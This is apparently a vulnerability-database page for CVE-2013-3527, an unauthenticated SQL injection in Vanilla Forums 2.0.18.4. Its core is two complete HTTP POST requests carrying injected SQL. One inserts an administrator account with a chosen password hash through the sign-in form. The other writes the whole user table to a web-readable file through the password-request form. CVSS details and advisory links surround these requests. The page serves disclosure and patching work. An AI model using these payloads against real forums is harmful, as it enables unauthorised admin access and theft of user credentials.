Vanilla Forums 2-0-18-4 SQL-Injection / Insert arbitrary user & dump usertable

2013.05.11

Credit: bl4ckw0rm

Risk: High

Local: No

Remote: Yes

CVE: CVE-2013-3527

CWE: N/A

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: Vanilla Forums - SQL-Injection - Insert arbitrary user & dump usertable
# Date: 04/05/2013
# Exploit Author: bl4ckw0rm
# Vendor Homepage: http://vanillaforums.org/
# Version: 2-0-18-4
# Tested on: Windows
Product Name:
Vanilla Forums
Vulnerable Version:
Up to vanilla-core-2-0-18-4
Tested on:
Windows Server 2003
Apache 2.4.3
PHP 5.4.7
MySQL 5.5.27
Vulnerability Overview:
SQL-Injection is possible, because$_POST arrays are not proper sanitized.
You do not need to be authenticated.
Vulnerability Details:
To insert an arbitrary user, a sample HTTP-Post Request looks as follows:
POST /[PATH]/vanilla/entry/signin HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: [any cookie]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 399
Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&
Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO gdn_user
(UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions)
VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla',
'2013-03-28 00:00:00', '1', '');#]=abcd&Form%2FPassword=*&Form%2FSign_In=
Sign+In&Checkboxes%5B%5D=RememberMe
Indeed you has to take care of the proper encryption algorithm which is currently used.
As it is not possible to get the user table displayed on the website, you could establish an attack as follows:
POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select *
from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13&
Form%2FRequest_a_new_password=Request+a+new+password

References:

https://github.com/vanillaforums/Garden/commit/83078591bc4d263e77d2a2ca283100997755290d

http://xforce.iss.net/xforce/xfdb/83289

http://www.securityfocus.com/bid/58922

http://www.exploit-db.com/exploits/24927

http://vanillaforums.org/discussion/23339/security-update-vanilla-2-0-18-7

http://secunia.com/advisories/52825

http://seclists.org/fulldisclosure/2013/Apr/57

http://packetstormsecurity.com/files/121151/Vanilla-Forums-2.0.18.4-SQL-Injection.html

http://osvdb.org/92110

http://osvdb.org/92109

http://mfs-enterprise.com/wordpress/2013/04/05/vanilla-forums-2-0-18-sql-injection-insert-arbitrary-user-dump-usertable/

http://archives.neohapsis.com/archives/bugtraq/2013-04/0068.html

http://cxsecurity.com/issue/WLB-2013040052

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vanilla Forums 2-0-18-4 SQL-Injection / Insert arbitrary user & dump usertable

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.